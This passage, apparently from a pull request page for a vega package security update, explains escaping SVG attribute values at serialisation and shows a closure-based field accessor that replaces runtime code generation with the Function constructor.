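  return `<g ${attrs.join(' ')}>`;
}

// Cheap structural check: after escaping, the only '"' characters left in the
// tag are the ones delimiting attribute values, so the count is exactly twice
// the number of attributes. An unescaped quote in a label would break this.
function countRawQuotes(tag) {
  return (tag.match(/"/g) || []).length;
}
```

The same escaping applies to any other attribute that carries spec-derived text (for example a title or a custom ariaRoleDescription channel); escaping at the point of serialisation, rather than at the point where the description is parsed, is what keeps a later feature from reintroducing the bug.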

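Several items in the changelog above drop the Function constructor (the aggregation ops, and the vega-util field, key and compare methods), replacing source text that was compiled at runtime with ordinary closures. The block below is an added example of the closure approach and is not vega-util's field implementation; its path grammar (dots, backslash-escaped characters, and ['x'] / ["x"] bracket segments) and the names splitFieldPath and fieldAccessor are assumptions. The practical point is that no part of the field string is ever evaluated as code, which is also what allows such code to run under a Content Security Policy that does not grant unsafe-eval.

```javascript
// Added example (not vega-util code): a field accessor that resolves dotted and
// bracketed paths with closures instead of generating source text for the
// Function constructor. The path grammar and the names splitFieldPath and
// fieldAccessor are this example's assumptions.

// Tokenise a field string into its successive property names.
function splitFieldPath(name) {
  const path = [];
  let cur = '';
  let i = 0;
  while (i < name.length) {
    const c = name[i];
    if (c === '\\' && i + 1 < name.length) {        // escaped character, e.g. "a\.b"
      cur += name[i + 1];
      i += 2;
    } else if (c === '.') {                          // segment separator
      if (cur.length) path.push(cur);
      cur = '';
      i += 1;
    } else if (c === '[') {                          // quoted bracket segment, e.g. a["b.c"]
      const quote = name[i + 1];
      if (quote !== '"' && quote !== "'") throw new Error(`bad field path: ${name}`);
      const end = name.indexOf(quote + ']', i + 2);
      if (end < 0) throw new Error(`unterminated bracket in field path: ${name}`);
      if (cur.length) path.push(cur);
      path.push(name.slice(i + 2, end));
      cur = '';
      i = end + 2;
    } else {
      cur += c;
      i += 1;
    }
  }
  if (cur.length) path.push(cur);
  return path;
}

// Build the accessor. Each segment is used only as a property key, so a field
// string that would read as JavaScript if it were spliced into generated source
// is here nothing more than a sequence of (probably missing) keys. Missing
// intermediate objects yield undefined rather than throwing.
function fieldAccessor(name) {
  const path = splitFieldPath(name);
  return datum => {
    let value = datum;
    for (const key of path) {
      if (value == null) return undefined;
      value = value[key];
    }
    return value;
  };
}
```

A code-generating accessor would have had to quote and escape every segment correctly before handing the string to the Function constructor; the closure version has no such step to get wrong, and it can be handed untrusted field names from a spec without widening what those names are able to do.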
@renovate (renovate bot) force-pushed the renovate/npm-vega-vulnerability branch from 5718c91 to 9db708b on April 17, 2023 at 10:57